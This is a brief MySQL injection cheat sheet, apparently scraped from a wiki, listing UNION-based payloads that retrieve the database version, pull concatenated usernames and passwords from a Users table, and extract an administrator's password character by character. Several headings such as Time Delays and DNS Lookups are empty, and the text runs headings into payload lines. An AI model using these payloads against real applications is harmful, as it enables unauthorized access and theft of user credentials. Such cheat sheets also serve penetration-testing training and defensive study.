Basic MySQL Injection Cheatsheet
Retreaving Database version
SELECT @@version' UNION SELECT NULL, @@version -- -String Concatenation
SELECT CONCAT(username, password) FROM Users' UNION SELECT NULL,CONCAT(username, ':', password) FROM Users-- -Substring
SELECT SUBSTRING(password, 2,1) FROM users where username = 'administrator'' AND SELECT SUBSTRING((SELECT Password FROM Users Where Username = 'Administrator'),1,1) = FUZZConditional Errors
Time Delays
DNS Lookups
Database Contents
Last updated